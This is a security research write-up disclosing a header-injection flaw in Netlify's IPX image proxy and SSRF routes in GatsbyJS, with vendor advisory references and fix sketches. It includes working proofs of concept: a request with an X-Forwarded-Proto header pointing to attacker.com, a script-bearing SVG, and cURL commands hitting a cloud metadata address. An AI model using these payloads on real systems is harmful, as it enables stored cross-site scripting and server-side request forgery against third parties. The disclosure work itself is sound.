Exploiting Static Site Generators: When Static Is Not Actually Static

Oct 28, 2022

Over the last ten years, we have seen the industrialization of the content management space. A decade ago, it felt like every individual and business had a dynamic WordPress blog, loaded up with a hundred plugins to do everything from adding widgets to improving performance. Over time, we realised this was a bad idea, as ensuring the security of third-party plugins seemed increasingly impossible.

People aspired to have faster websites, with fewer security risks. People were tired of trying to improve performance by installing a plugin like W3-Total-Cache and then later realising they were compromised because it had critical vulnerabilities.

Naturally, people started building alternatives to what felt like a broken content management system from a security and performance perspective. Some people started moving to the model of publishing their WordPress blogs in a static manner, but we also saw the rise of static site generators like Jekyll, Hugo, Gatsby and Next.js.

These static site generators promised performance, because they did not require server-side processing (unless that was something you really wanted), and security too, because static sites are supposed to be static, right? How are you going to find vulnerabilities in a static site?

But eventually, as these static site generators rapidly matured, CDN/CI platforms such as Netlify and Vercel arrived, bringing many of the additional features on top of static sites that people had always longed for. Additionally, some static site generators, like Gatsby, offered a cloud version of their product.

Unfortunately, the additional server-side features offered through these platforms came at a cost: they had to run somewhere. Typically, this was “on the edge”, which is just a fancy way of saying they were run by the respective platforms on their CDNs as serverless functions.

And now, when most people think about server-side code running on someone else’s computer, especially in a serverless context, they rightfully understand that a lot of the server-side risks of compromise (e.g. SSRF) are no longer as impactful. But what about the potential client-side issues that may exist?

The rise of these static site generator frameworks also holds a very important place in the Web3 world. My friend Sam Curry and his deep application security research in the Web3 space were the main reason why I spent so much time looking at these frameworks and platforms in the first place.

You can read about Sam’s take on these issues here. In his blog post you’ll find a few more examples of vulnerabilities in Next.js’s image optimizer, as well as the vulnerability we found in Netlify IPX, which we also discuss in this blog.

[Screenshot: Sam Curry reaching out to me on Discord about some weird behaviour on a Netlify Next.js website]

It all started with this message from Sam, showing me some interesting behaviour on www.gemini.com, one of the largest crypto exchanges in the world, which uses Netlify + Next.js to host its website.

This intrigued me, as at first glance it looked like there was functionality to both pull and optimize images from remote sources, built directly into Netlify-operated websites. This reminded me of Next.js’s native image optimization functionality (found at _next/image): similar, but different, being something specific to Netlify and hosted at _ipx/.

In Next.js, the image proxy is unable to pull data from remote sources without the domain being within an explicit whitelist (domain or regex), which is typically not populated by default. We thought that this implementation may be similar, so we took a look at the source code for the @netlify/ipx library.
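For context, a Next.js allowlist of this kind usually lives in next.config.js. The fragment below is a minimal sketch rather than a recommended configuration: the hostnames are placeholders, and the object is written as a plain TypeScript constant purely for illustration.

```typescript
// Illustrative fragment only; the hostnames are placeholders and do not
// come from the research described in this post.
const nextConfig = {
  images: {
    // Exact hostnames the image optimizer is allowed to fetch from.
    domains: ['images.example.com'],
    // Pattern-based entries, available in newer Next.js releases.
    remotePatterns: [{ protocol: 'https', hostname: '**.example.com' }],
  },
}

// In a real project this object would be exported from next.config.js.
console.log(nextConfig.images.domains)
```

With both lists left empty, which is the usual default, the optimizer has no remote hosts it is permitted to fetch from.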

Thankfully, Netlify had published the source code of this library on their GitHub, and you can find the vulnerable version of the code here.

When auditing the code, we noticed that Netlify’s IPX library also had mechanisms to whitelist the remote HTTP sources that could be pulled through this image optimizer proxy. However, after glancing at the code a few times, we noticed that the final URL that was constructed and requested was derived from user input that Netlify had not considered.

On line 33 of the handler, we can see that the value of the protocol variable is derived from a user-controllable header, x-forwarded-proto:

    const handler: Handler = async (event, _context) => {
      const host = event.headers.host
      const protocol = event.headers['x-forwarded-proto'] || 'http'

While this seems benign, it’s worth noting because of the following logic:

    let id = decodeURIComponent(segments.join('/'))

... omitted for brevity ...

    const requestHeaders: Record<string, string> = {}
    const isLocal = !id.startsWith('http')
    if (isLocal) {
      id = `${protocol}://${host}${id.startsWith('/') ? '' : '/'}${id}`
      if (event.headers.cookie) {
        requestHeaders.cookie = event.headers.cookie
      }
      if (event.headers.authorization) {
        requestHeaders.authorization = event.headers.authorization
      }
    } else {

The id variable is derived from the URL path, and a variable isLocal is declared based on whether or not the id parameter starts with the literal string http.

If isLocal evaluates to true, it constructs a URL to request through the proxy, which unfortunately can easily be tainted through the user-controllable protocol variable derived from our x-forwarded-proto header.

By sending a header and value such as x-forwarded-proto: https://evil.com/?, the constructed URL would request our website, as the ? turns the rest of the constructed string into a query string that our server can simply ignore.
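To make the effect concrete, here is a minimal sketch that reuses the template string from the handler and parses the result with the standard URL class. The buildLocalUrl helper and the example.com host are assumptions made for illustration; they are not part of the Netlify code base.

```typescript
// Hypothetical helper that mirrors the string construction in the handler.
function buildLocalUrl(protocol: string, host: string, id: string): string {
  return `${protocol}://${host}${id.startsWith('/') ? '' : '/'}${id}`
}

// The id does not start with "http", so the handler would treat it as local.
const id = 'example.svg'
const isLocal = !id.startsWith('http')

// Attacker-supplied x-forwarded-proto value.
const tainted = buildLocalUrl('https://evil.com/?', 'example.com', id)
const parsed = new URL(tainted)

console.log(isLocal)         // true
console.log(tainted)         // https://evil.com/?://example.com/example.svg
console.log(parsed.hostname) // evil.com
console.log(parsed.search)   // ?://example.com/example.svg
```

The intended host and path end up inside the query string, so the request goes to the attacker's server instead.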

The even more unfortunate part about this code is that all of the logic checks that determine whether or not a host is whitelisted happen in the else statement, which we are able to skip because isLocal evaluates to true.
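One way to close this kind of gap is to treat the forwarded protocol as untrusted and accept only known schemes before building the URL. The sketch below is a hypothetical hardening written for this post, not the fix that Netlify shipped; safeProtocol and buildTrustedLocalUrl are made-up names.

```typescript
// Hypothetical hardening sketch; not the patch applied to @netlify/ipx.
const ALLOWED_PROTOCOLS = new Set(['http', 'https'])

// Accept only a bare "http" or "https"; anything else falls back to "http".
function safeProtocol(headerValue: string | undefined): string {
  // Some proxies send a comma-separated list; only the first entry is used.
  const candidate = (headerValue ?? 'http').split(',')[0].trim().toLowerCase()
  return ALLOWED_PROTOCOLS.has(candidate) ? candidate : 'http'
}

// Build the local URL from validated parts instead of raw concatenation.
function buildTrustedLocalUrl(headerValue: string | undefined, host: string, id: string): URL {
  const url = new URL(`${safeProtocol(headerValue)}://${host}`)
  url.pathname = id.startsWith('/') ? id : `/${id}`
  return url
}

const hardened = buildTrustedLocalUrl('https://evil.com/?', 'example.com', 'example.svg')
console.log(hardened.href) // http://example.com/example.svg
```

The host header is also client-supplied, so a real fix would likely need to validate it as well. This sketch only covers the protocol.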

Since the else code block is skipped, we end up at the following block of code:

    const { response, cacheKey, responseEtag } = await loadSourceImage({
      cacheDir,
      url: id,
      requestEtag,
      modifiers,
      isLocal,
      requestHeaders
    })

The loadSourceImage function is responsible for downloading the remote resource, as well as caching it to the disk:

  let response
  try {
    response = await fetch(url, {
      headers
    })
  } catch (e) {
    return {
      response: {
        statusCode: GATEWAY_ERROR,
        headers: {
          'Content-Type': 'text/plain'
        },
        body: `Error loading source image: ${e.message} ${url}`
      }
    }
  }
... omitted for brevity ...
  const outfile = createWriteStream(inputCacheFile)
  await new Promise((resolve, reject) => {
    outfile.on('finish', resolve)
    outfile.on('error', reject)
    response.body.pipe(outfile)
  })
  return { cacheKey, responseEtag }

As you can see in the logic above, the sink which makes the HTTP request is fetch, and after the response has been obtained, it is cached to disk.

Now you might be thinking that it’s not all that bad because this is an image optimizer, right? It should only be allowing image files, so what’s the harm in that?

Unfortunately, the underlying ipx library ultimately depends on the image-meta library, and there we can see that the SVG type is supported.

As long as the SVG file matches the following regex, the Netlify IPX handler will happily proxy the response and cache it to disk:

const svgReg = /<svg\s([^>"']|"[^"]*"|'[^']*')*>/

const extractorRegExps = {
  height: /\sheight=(['"])([^%]+?)\1/,
  root: svgReg,
  viewbox: /\sviewBox=(['"])(.+?)\1/,
  width: /\swidth=(['"])([^%]+?)\1/
}
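As a quick check of how permissive this is, the sketch below runs the root regex from the snippet above against an SVG that carries a script element. The sample documents are made up for illustration. The sketch exercises only the regex, not the rest of image-meta's detection logic.

```typescript
// Root regex copied from the snippet above.
const svgReg = /<svg\s([^>"']|"[^"]*"|'[^']*')*>/

// Made-up sample: a syntactically valid SVG with an embedded script.
const scriptedSvg = `<svg viewBox="0 0 200 200" xmlns="http://www.w3.org/2000/svg">
  <foreignObject>
    <div xmlns="http://www.w3.org/1999/xhtml"><script>alert(1)</script></div>
  </foreignObject>
</svg>`

const plainHtml = '<html><body>not an svg</body></html>'

console.log(svgReg.test(scriptedSvg)) // true
console.log(svgReg.test(plainHtml))   // false
```

The regex only looks for a well-formed opening svg tag, so nothing about the document body, including script content, affects the match.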

As also stated in Sam’s blog, the final proof-of-concept for this vulnerability can be found below:

GET /_ipx/example.svg
Host: example.com
X-Forwarded-Proto: http://attacker.com/malicious.svg?

Where the contents of malicious.svg looked something like this:

<svg viewBox="0 0 200 200" xmlns="http://www.w3.org/2000/svg">
  <defs>
  <pattern id="img1" patternUnits="userSpaceOnUse" width="100" height="100">
    <image href="https://www.google.com/favicon.ico" x="0" y="0" width="100" height="100" />
  </pattern>
</defs>
  <foreignObject>
  <div id="one">
    <div id="two" xmlns="http://www.w3.org/1999/xhtml">
      <script>alert('assetnote');</script>
    </div>
  </div>
  </foreignObject>
</svg>

This resulted in persistent cross-site scripting across hundreds of thousands of Netlify websites that were using Next.js.

The impact was widespread because, by default, creating a Next.js website on Netlify would automatically bootstrap the website with package = "@netlify/plugin-nextjs" inside the netlify.toml file, which loads the @netlify/ipx library into your Next.js project.

When building a Next.js website on Netlify with this plugin installed, we can see in the CI/build logs that the following routes are registered:

9:53:04 AM:   {
9:53:04 AM:     from: '/_next/image*',
9:53:04 AM:     query: { url: ':url', w: ':width', q: ':quality' },
9:53:04 AM:     to: '/_ipx/w_:width,q_:quality/:url',
9:53:04 AM:     status: 301
9:53:04 AM:   },
9:53:04 AM:   { from: '/_ipx/*', to: '/.netlify/builders/_ipx', status: 200 },
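Read together, the two rules mean that a request to the familiar Next.js image endpoint is redirected into the IPX handler. The sketch below models the first rule as a plain function. It is an approximation: rewriteNextImagePath is a hypothetical name, and encoding the url value with encodeURIComponent is an assumption rather than confirmed Netlify behaviour.

```typescript
// Hypothetical model of the logged redirect rule; not Netlify's implementation.
function rewriteNextImagePath(requestPath: string): string | null {
  // A placeholder base is needed because URL cannot parse a bare path.
  const parsed = new URL(requestPath, 'http://placeholder.invalid')
  if (!parsed.pathname.startsWith('/_next/image')) return null

  const url = parsed.searchParams.get('url')
  const width = parsed.searchParams.get('w')
  const quality = parsed.searchParams.get('q')
  if (url === null || width === null || quality === null) return null

  // Assumption: the url value is percent-encoded into a single path segment.
  return `/_ipx/w_${width},q_${quality}/${encodeURIComponent(url)}`
}

console.log(rewriteNextImagePath('/_next/image?url=%2Fhero.png&w=640&q=75'))
// /_ipx/w_640,q_75/%2Fhero.png
```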

After we had determined that the underlying @netlify/ipx library was vulnerable, we started enumerating where else this functionality may have been used.

Now we’ve found a number of vulnerabilities in Netlify’s implementation of the image proxy, but what about the static site frameworks themselves? We decided to take a closer look at the GatsbyJS framework, as we had already spent a lot of time looking at Next.js.

Targeting any proxy-like functionality inside these code bases, we ended up in gatsby-plugin-utils/src/polyfill-remote-file/http-routes.ts which defined the following routes:

  app.get(`/_gatsby/file/:url/:filename`, async (req, res) => {
    const outputDir = path.join(
      global.__GATSBY?.root || process.cwd(),
      `public`,
      `_gatsby`,
      `file`
    )

    const url = req.query[ImageCDNUrlKeys.URL] as string

    const filePath = await fetchRemoteFile({
      directory: outputDir,
      url,
      name: req.params.filename,
      httpHeaders: getRequestHeadersForUrl(url, store),
    })

    fs.createReadStream(filePath).pipe(res)
  })

  app.get(`/_gatsby/image/:url/:params/:filename`, async (req, res) => {
    const { url, params, filename } = req.params
    const remoteUrl = decodeURIComponent(
      req.query[ImageCDNUrlKeys.URL] as string
    )
    const searchParams = new URLSearchParams(
      decodeURIComponent(req.query[ImageCDNUrlKeys.ARGS] as string)
    )

... omitted for brevity ...

    const filePath = await transformImage({
      outputDir,
      args: {
        url: remoteUrl,
        filename,
        httpHeaders,
        ...resizeParams,
      },
    })

    res.setHeader(
      `content-type`,
      getFileExtensionFromMimeType(path.extname(filename))
    )

    fs.createReadStream(filePath).pipe(res)
  })

For /_gatsby/file/:url/:filename, the sink was await fetchRemoteFile, and for /_gatsby/image/:url/:params/:filename the sink was await transformImage.

The first route allows you to proxy any URL, regardless of content type 😱

The second route only allows you to proxy images, and this time SVGs are not allowed, so the impact is limited to a blind SSRF vulnerability. Requesting an SVG fails with: Error: Expected one of: heic, heif, avif, jpeg, jpg, png, raw, tiff, tif, webp, gif, jp2, jpx, j2k, j2c for format but received svg of type string.

In order for these issues to be exploitable, the GatsbyJS server would need to be running. Now, we understand that this is an uncommon configuration as the point of these static site generators … is to actually generate static files that can be hosted.

Nonetheless, these vulnerabilities still pose a real risk to anyone who is running a GatsbyJS server using gatsby develop instead of hosting the static files or using gatsby serve.

The full-read server-side request forgery vulnerability in GatsbyJS can be exploited through the following cURL command:

❯ curl 'http://localhost:8000/_gatsby/file/5ddf5110dc1ab9ef782c3ecfbfb7d613/test.png?u=https%3A%2F%2Fssrfcanary.com/&a=w%3D42%26h%3D75%26fm%3Draw%26q%3D70' --output - | xxd

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   121    0   121    0     0    292      0 --:--:-- --:--:-- --:--:--   297
00000000: 3c68 746d 6c3e 3c68 6561 643e 3c74 6974  <html><head><tit
00000010: 6c65 3e53 5352 4620 4361 6e61 7279 207a  le>SSRF Canary z
00000020: 7978 6a35 6467 3764 3139 6a66 6473 3965  yxj5dg7d19jfds9e
00000030: 6e6e 6c34 627a 6a6d 677a 3c2f 7469 746c  nnl4bzjmgz</titl
00000040: 653e 3c2f 6865 6164 3e3c 626f 6479 3e7a  e></head><body>z
00000050: 7978 6a35 6467 3764 3139 6a66 6473 3965  yxj5dg7d19jfds9e
00000060: 6e6e 6c34 627a 6a6d 677a 3c2f 626f 6479  nnl4bzjmgz</body
00000070: 3e3c 2f68 746d 6c3e 0a                   ></html>.

The blind server-side request forgery vulnerability can be exploited via the following cURL command:

❯ curl 'http://localhost:8000/_gatsby/image/5ddf5110dc1ab9ef782c3ecfbfb7d613/a93f780cab7aa92bdecc09e6d0416651/test.png?u=https%3A%2F%2Fssrfcanary.com/&a=w%3D42%26h%3D75%26fm%3Draw%26q%3D70' --output - | xxd
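Both cURL commands carry the target in the query string rather than in the path. The sketch below decodes the first proof-of-concept URL with the standard URL and URLSearchParams classes. That u and a correspond to ImageCDNUrlKeys.URL and ImageCDNUrlKeys.ARGS is inferred from the commands above, not taken from the Gatsby source.

```typescript
// Proof-of-concept URL copied from the full-read SSRF command above.
const poc =
  'http://localhost:8000/_gatsby/file/5ddf5110dc1ab9ef782c3ecfbfb7d613/test.png' +
  '?u=https%3A%2F%2Fssrfcanary.com/&a=w%3D42%26h%3D75%26fm%3Draw%26q%3D70'

const { pathname, searchParams } = new URL(poc)

// Path segments: the hash-like :url segment and the :filename.
const segments = pathname.split('/').filter(Boolean)

// "u" is the value the route handler passes on to the fetching code.
const remoteUrl = searchParams.get('u')

// "a" is itself a URL-encoded query string of image arguments.
const imageArgs = new URLSearchParams(searchParams.get('a') ?? '')

console.log(segments)            // [ '_gatsby', 'file', '5ddf5110dc1ab9ef782c3ecfbfb7d613', 'test.png' ]
console.log(remoteUrl)           // https://ssrfcanary.com/
console.log(imageArgs.get('w'))  // 42
console.log(imageArgs.get('fm')) // raw
```

In the route code shown earlier, the fetched URL is read from the query string, so the :url path segment does not determine which remote resource is requested.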

The full-read SSRF vulnerability allowed us to hit GatsbyJS’s GCP metadata IP address:

❯ curl "https://somehost.gatsbyjs.io/_gatsby/file/5ddf5110dc1ab9ef782c3ecfbfb7d613/test.png?u=http%3A%2F%2F169.254.169.254/&a=w%3D42%26h%3D75%26fm%3Draw%26q%3D70"

computeMetadata/

It is important to note that in order to communicate further with the GCP metadata IP address and pull any sensitive information, we must provide a custom header (Metadata-Flavor: Google), which is not possible through GatsbyJS’s proxy implementation. Additionally, after discussing with the Gatsby security team, they confirmed that the GCP metadata access is for their Image CDN provider, not Gatsby’s hosting infrastructure.

During our routine scans of our customers’ infrastructure for this vulnerability, we discovered that these vulnerabilities were exploitable in some configurations of GatsbyJS’s cloud product. This led to a number of high-impact, high-profile cross-site scripting vulnerabilities being found on our customers’ attack surfaces.

You can read the official advisory from GatsbyJS regarding these vulnerabilities here: https://www.gatsbyjs.com/blog/vulnerability-patched-in-the-gatsby-cloud-image-cdn/.